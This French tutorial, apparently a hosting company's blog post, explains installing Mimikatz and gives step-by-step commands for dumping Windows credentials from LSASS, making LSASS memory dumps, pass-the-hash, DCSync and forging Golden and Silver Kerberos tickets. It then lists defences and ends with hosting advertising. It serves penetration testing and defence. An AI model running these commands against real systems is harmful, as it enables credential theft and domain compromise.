Comment installer et utiliser Mimikatz : un guide complet pour les professionnels de la sécurité

Mimikatz est l’un des outils les plus connus et les plus largement discutés dans le monde de la cybersécurité. Développé à l’origine comme une preuve de concept pour démontrer les vulnérabilités de l’authentification Windows, il est devenu un instrument essentiel dans la boîte à outils des testeurs de pénétration, des équipes red team et des chercheurs en sécurité. Ce guide fournit une présentation approfondie de ce qu’est Mimikatz, qui l’utilise, et comment l’installer et l’utiliser de manière responsable dans un environnement contrôlé.

> Avertissement légal : Mimikatz ne doit être utilisé que sur des systèmes que vous possédez ou pour lesquels vous disposez d’une autorisation écrite explicite pour effectuer des tests. Toute utilisation non autorisée est illégale et peut entraîner de graves sanctions pénales. Ce guide est destiné uniquement à des fins éducatives et à des tests de sécurité légitimes.

—

Qu’est-ce que Mimikatz ?

Mimikatz est un outil de sécurité Windows open-source créé par le chercheur en sécurité français Benjamin Delpy. Sa fonction principale est d’extraire les identifiants d’authentification — notamment les mots de passe en clair, les hachages de mots de passe NTLM, les codes PIN et les tickets Kerberos — directement depuis la mémoire d’un système Windows (plus précisément depuis le processus LSASS).

Parce que Windows mettait historiquement en cache les identifiants en mémoire pour prendre en charge une authentification transparente entre les services, Mimikatz a pu exposer une faiblesse de conception fondamentale dans la façon dont le système d’exploitation gérait les données d’authentification sensibles. Microsoft a depuis introduit des mesures d’atténuation telles que Credential Guard et le groupe de sécurité Protected Users, mais Mimikatz continue d’évoluer parallèlement à ces défenses, ce qui en fait un outil de référence inestimable pour comprendre le paysage actuel des menaces.

Capacités clés de Mimikatz

• Extraction de mots de passe en clair depuis la mémoire Windows (LSASS)
• Extraction de hachages NTLM depuis la base de données SAM et Active Directory
• Extraction et manipulation de tickets Kerberos (attaques Golden Ticket, Silver Ticket)
• Authentification Pass-the-Hash (PtH) à l’aide de hachages capturés
• Attaques Pass-the-Ticket (PtT) à l’aide de tickets Kerberos volés
• Attaques DCSync pour répliquer les données du contrôleur de domaine sans accès direct

—

Qui utilise Mimikatz et pourquoi ?

Cas d’utilisation légitimes en sécurité

Mimikatz est principalement utilisé par les professionnels de la sécurité de l’information dans les contextes suivants :

• Tests de pénétration — Simulation d’attaques de vol d’identifiants réels pour évaluer la résistance des défenses d’une organisation face à un adversaire ayant obtenu un accès initial.
• Opérations red team — Émulation de techniques de menaces persistantes avancées (APT) pour tester les capacités de détection et de réponse des équipes blue team et des analystes SOC.
• Audits de sécurité — Évaluation de la conformité du stockage et de la protection des mots de passe et des tickets Kerberos aux meilleures pratiques de sécurité.
• Formation et sensibilisation — Démonstration aux administrateurs système et aux ingénieurs du fonctionnement concret des attaques basées sur les identifiants, rendant les menaces abstraites tangibles et exploitables.
• Recherche en vulnérabilités — Identification de nouvelles faiblesses dans les mécanismes d’authentification Windows avant que des acteurs malveillants ne puissent les exploiter.

Abus malveillants

Malheureusement, Mimikatz est également un outil favori parmi les acteurs de menaces en raison de son efficacité. Les cas d’utilisation malveillants courants comprennent :

• Attaques Pass-the-Hash — Authentification auprès de systèmes à l’aide de hachages NTLM capturés sans jamais connaître le mot de passe en clair d’origine.
• Attaques Pass-the-Ticket — Utilisation de tickets Kerberos volés pour usurper l’identité d’utilisateurs légitimes sur un réseau.
• Persistance post-exploitation — Collecte d’identifiants après une violation initiale pour se déplacer latéralement dans un réseau et escalader les privilèges.
• Attaques Golden Ticket — Falsification de Tickets Granting Tickets (TGT) Kerberos pour obtenir un accès persistant et quasi illimité aux ressources du domaine.

Comprendre comment les attaquants utilisent Mimikatz est précisément la raison pour laquelle les défenseurs doivent le connaître. Si vous gérez un environnement VPS Hosting ou une infrastructure dédiée, la connaissance de ces vecteurs d’attaque vous aide à construire des défenses plus résilientes.

—

Prérequis

Avant de continuer, assurez-vous que les conditions suivantes sont remplies dans votre environnement de test autorisé :

> Bonne pratique : Effectuez toujours les tests Mimikatz dans une machine virtuelle isolée ou un serveur de laboratoire dédié. Si vous avez besoin d’un environnement sécurisé et isolé pour les laboratoires de tests de pénétration, envisagez de déployer une instance VPS Hosting avec une image Windows pour maintenir vos tests complètement séparés de l’infrastructure de production.

—

Étape 1 : Télécharger Mimikatz

1.1 Visiter le dépôt GitHub officiel

Mimikatz est maintenu en tant que projet open-source. Téléchargez-le toujours depuis la source officielle pour éviter les versions altérées ou trojanisées :

Dépôt officiel : https://github.com/gentilkiwi/mimikatz

1.2 Télécharger la dernière version

1. Accédez à la section Releases du dépôt (barre latérale droite ou via le chemin URL /releases).
2. Localisez la version stable la plus récente.
3. Téléchargez l’archive précompilée — généralement nommée mimikatz_trunk.zip.

1.3 Extraire l’archive

1. Faites un clic droit sur le fichier ZIP téléchargé.
2. Sélectionnez Extraire tout…
3. Choisissez un répertoire de destination, par exemple : C:SecurityToolsMimikatz

Après l’extraction, vous trouverez deux sous-répertoires :

• x64 — Binaires 64 bits (à utiliser sur les systèmes modernes)
• Win32 — Binaires 32 bits (pour les systèmes hérités)

L’exécutable principal avec lequel vous travaillerez est mimikatz.exe.

—

Étape 2 : Exécuter Mimikatz

2.1 Ouvrir une invite de commandes élevée

Mimikatz nécessite des privilèges administratifs pour interagir avec les régions de mémoire protégées. Pour lancer un shell élevé :

1. Appuyez sur Windows + X
2. Sélectionnez Invite de commandes (Admin) ou Windows PowerShell (Admin)
3. Cliquez sur Oui dans l’invite UAC

2.2 Naviguer vers le répertoire Mimikatz

cd C:SecurityToolsMimikatzx64

Vérifiez que mimikatz.exe est présent dans ce répertoire :

dir mimikatz.exe

2.3 Lancer Mimikatz

mimikatz.exe

Si l’outil démarre avec succès, vous verrez la bannière Mimikatz et l’invite interactive :

  .#####.   mimikatz 2.2.0 (x64) ...
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ##  / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'         > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz #

L’invite mimikatz # confirme que l’outil est en cours d’exécution et prêt à accepter des commandes.

2.4 Activer les privilèges de débogage

Avant d’exécuter la plupart des commandes d’extraction d’identifiants, élevez les propres privilèges de Mimikatz dans la session :

mimikatz # privilege::debug

Sortie attendue :

Privilege '20' OK

Cela accorde à Mimikatz le droit SeDebugPrivilege, qui est nécessaire pour lire la mémoire des processus protégés comme LSASS.

—

Étape 3 : Commandes principales de Mimikatz

3.1 Extraire les mots de passe en clair depuis la mémoire

Il s’agit de la capacité la plus connue de Mimikatz. Elle lit les identifiants mis en cache par le fournisseur d’authentification WDigest directement depuis la mémoire LSASS :

mimikatz # sekurlsa::logonpasswords

Ce qu’elle retourne :

• Noms d’utilisateurs connectés
• Noms de domaine
• Mots de passe en clair (si la mise en cache WDigest est activée)
• Hachages NTLM
• Hachages SHA1
• Identifiants Kerberos

> Remarque : Sur Windows 8.1 et versions ultérieures, Microsoft a désactivé la mise en cache des mots de passe en clair WDigest par défaut. Cependant, les attaquants (et les testeurs) peuvent la réactiver via une clé de registre, ce qui explique pourquoi ce cas de test reste pertinent.

3.2 Afficher les mots de passe stockés (commande alternative)

mimikatz # sekurlsa::passwords

Cette commande fournit une vue simplifiée des identifiants disponibles dans la mémoire système.

3.3 Extraire les identifiants depuis un fichier de vidage mémoire

Si vous ne pouvez pas exécuter Mimikatz directement sur le système cible, vous pouvez d’abord capturer un vidage mémoire LSASS et l’analyser hors ligne :

Créer le vidage à l’aide du Gestionnaire des tâches :

1. Ouvrez le Gestionnaire des tâches → onglet Détails
2. Faites un clic droit sur lsass.exe → Créer un fichier de vidage

Ou utilisez ProcDump (de Sysinternals) :

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Analyser le vidage avec Mimikatz :

mimikatz # sekurlsa::minidump C:PathTolsass.dmp
mimikatz # sekurlsa::logonpasswords

3.4 Lister les tickets Kerberos

Pour énumérer tous les tickets Kerberos présents dans la session de connexion actuelle :

mimikatz # kerberos::list

Pour lister les tickets avec tous les détails, y compris les clés de session :

mimikatz # kerberos::list /export

Cela exporte chaque ticket en tant que fichier .kirbi, qui peut être utilisé dans des attaques Pass-the-Ticket.

3.5 Exporter les identifiants vers un fichier

Pour sauvegarder la sortie d’un vidage d’identifiants dans un fichier texte pour une analyse ultérieure :

mimikatz # sekurlsa::logonpasswords > C:SecurityToolscredentials.txt

La sortie sera écrite dans credentials.txt dans le chemin spécifié.

—

Étape 4 : Techniques avancées de Mimikatz

4.1 Attaque Pass-the-Hash (PtH)

Pass-the-Hash permet l’authentification auprès d’un système distant à l’aide d’un hachage NTLM capturé, sans avoir besoin du mot de passe en clair :

mimikatz # sekurlsa::pth /user:Administrator /domain:TARGETDOMAIN /ntlm:<NTLM_HASH> /run:cmd.exe

Cela génère un nouveau processus cmd.exe authentifié en tant qu’utilisateur spécifié à l’aide du hachage.

4.2 Attaque Golden Ticket

Un Golden Ticket est un TGT Kerberos falsifié signé avec le hachage du mot de passe du compte KRBTGT, accordant au détenteur un accès quasi illimité aux ressources du domaine. Cela nécessite le hachage KRBTGT, qui peut être obtenu via DCSync :

Étape 1 — DCSync pour extraire le hachage KRBTGT :

mimikatz # lsadump::dcsync /domain:target.local /user:krbtgt

Étape 2 — Créer le Golden Ticket :

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_HASH> /ticket:golden.kirbi

Étape 3 — Injecter le ticket :

mimikatz # kerberos::ptt golden.kirbi

4.3 Extraire les hachages NTLM depuis la base de données SAM

Pour extraire les hachages des comptes locaux depuis la base de données SAM (nécessite des privilèges SYSTEM) :

mimikatz # lsadump::sam

4.4 Extraire les secrets depuis LSA

mimikatz # lsadump::secrets

Cela récupère les secrets LSA, qui peuvent inclure les identifiants des comptes de service, les identifiants de domaine mis en cache et d’autres données sensibles stockées par l’Autorité de sécurité locale.

4.5 Attaque Silver Ticket

Un Silver Ticket cible un service spécifique plutôt que l’ensemble du domaine. Il nécessite le hachage NTLM du compte de service cible :

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /target:<SERVICE_HOST> /service:cifs /rc4:<SERVICE_ACCOUNT_HASH> /ticket:silver.kirbi

—

Étape 5 : Contre-mesures défensives

Comprendre le fonctionnement de Mimikatz n’est que la moitié de l’équation. L’autre moitié consiste à savoir comment s’en défendre. Si vous gérez des serveurs Windows — que ce soit sur des Serveurs Dédiés ou une infrastructure cloud — les mesures d’atténuation suivantes sont essentielles :

5.1 Activer Credential Guard

Windows Credential Guard utilise la sécurité basée sur la virtualisation (VBS) pour isoler LSASS dans un conteneur protégé, empêchant Mimikatz de lire les identifiants directement depuis la mémoire.

Activer via la stratégie de groupe :

Computer Configuration → Administrative Templates → System → Device Guard → Turn On Virtualization Based Security

5.2 Désactiver l’authentification WDigest

Empêchez la mise en cache des mots de passe en clair en désactivant WDigest :

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersWDigest
UseLogonCredential = 0

5.3 Ajouter des utilisateurs au groupe Protected Users

Les membres du groupe de sécurité Protected Users ne peuvent pas s’authentifier à l’aide de NTLM, DES ou du chiffrement Kerberos RC4, limitant considérablement l’efficacité des attaques de vol d’identifiants.

5.4 Implémenter la protection LSA (RunAsPPL)

Activez Protected Process Light (PPL) pour LSASS afin d’empêcher tout accès non autorisé à la mémoire :

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa
RunAsPPL = 1

5.5 Surveiller les indicateurs Mimikatz

Configurez votre solution SIEM ou EDR pour alerter sur :

• L’accès à la mémoire lsass.exe depuis des processus inattendus
• SeDebugPrivilege accordé à des processus non système
• Les modèles de commandes suspects sekurlsa, kerberos ou lsadump dans les journaux de processus
• Les événements inhabituels de création de fichiers de vidage LSASS (Event ID 4656, 4663)

5.6 Maintenir les systèmes à jour

De nombreuses techniques Mimikatz exploitent des vulnérabilités connues ou des comportements hérités. Maintenir Windows et Active Directory entièrement à jour élimine des catégories entières de vecteurs d’attaque.

—

Mimikatz dans le contexte d’une infrastructure d’hébergement sécurisée

Pour les organisations qui exploitent des applications web, des API ou des services internes, le risque de vol d’identifiants s’étend au-delà du poste de travail local. Si un attaquant accède à votre environnement serveur, des outils comme Mimikatz peuvent être utilisés pour escalader les privilèges et se déplacer latéralement.

Choisir un fournisseur d’hébergement qui donne la priorité à la sécurité au niveau de l’infrastructure est une couche de défense importante. Que vous ayez besoin d’un Hébergement Web Mutualisé pour des projets plus petits ou de Serveurs Dédiés pour des charges de travail d’entreprise, s’assurer que votre environnement d’hébergement inclut la protection DDoS, l’isolation réseau et des mises à jour de sécurité régulières réduit votre surface d’attaque globale.

Pour les équipes gérant des environnements Active Directory ou des applications basées sur Windows, associer votre infrastructure à des Certificats SSL correctement configurés garantit que les identifiants transmis entre les clients et les serveurs sont chiffrés en transit — ajoutant une couche supplémentaire de protection contre l’interception.

—

Résumé : Référence des commandes Mimikatz

—

Conclusion

Mimikatz reste l’un des outils les plus puissants et les plus instructifs disponibles pour les professionnels de la cybersécurité. Sa capacité à exposer les faiblesses fondamentales des mécanismes d’authentification Windows a conduit à des améliorations significatives dans la façon dont Microsoft conçoit la protection des identifiants — de Credential Guard à Protected Users en passant par LSA PPL. Pour les testeurs de pénétration, les équipes red team et les chercheurs en sécurité, une compréhension approfondie de Mimikatz n’est pas optionnelle ; elle est essentielle.

Les principes clés à toujours garder à l’esprit :

• Obtenez toujours une autorisation écrite explicite avant d’utiliser Mimikatz sur n’importe quel système.
• Utilisez des environnements isolés — machines virtuelles ou serveurs de laboratoire dédiés — pour éviter toute exposition accidentelle.
• Comprenez les défenses aussi profondément que vous comprenez les attaques.
• Restez à jour — Mimikatz et les défenses Windows évoluent continuellement.

En combinant une connaissance pratique d’outils comme Mimikatz avec une infrastructure d’hébergement sécurisée et bien configurée, les équipes de sécurité peuvent construire des défenses genuinement testées contre des techniques d’attaque réelles plutôt que des hypothèses théoriques.

—

*AlexHost fournit des solutions d’hébergement sécurisées et haute performance conçues pour les professionnels soucieux de la sécurité. Découvrez nos offres VPS Hosting et nos Serveurs Dédiés pour construire votre prochain laboratoire sécurisé ou environnement de production.*